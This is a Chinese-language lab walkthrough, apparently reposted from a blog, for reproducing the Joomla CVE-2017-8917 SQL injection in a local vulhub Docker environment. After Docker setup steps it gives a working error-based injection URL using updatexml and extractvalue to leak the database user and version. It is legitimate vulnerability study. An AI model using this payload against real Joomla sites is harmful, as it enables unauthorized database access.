本漏洞测试使用的是虚拟机Ubuntu 18.04 LTS
sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl software-properties-common
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
sudo apt-get update
sudo apt-get install -y docker-ce
sudo systemctl status docker
sudo systemctl start docker
sudo docker run hello-world
出现以上内容,证明docker安装成功,建议安装docker前先拍摄快照
sudo curl -L "https://github.com/docker/compose/releases/download/1.23.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
docker-compose --version
git clone https://github.com/vulhub/vulhub
cd vulhub/joomla/CVE-2017-8917
sudo docker-compose up -d
访问下面的网址
http://localhost:8080
数据库主机名 :mysql:3306
数据库用户名:root
数据库密码:root
数据库名称:joomla
在地址localhost:8080后添加以下内容,并访问
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
将updatexml(0x23,concat(1,user()),1)改为extractvalue(666,concat(0x3a,version(),0x3a))
extractvalue(666,concat(0x3a,version(),0x3a))
转载链接:
https://blog.csdn.net/sun1296825481/article/details/103485401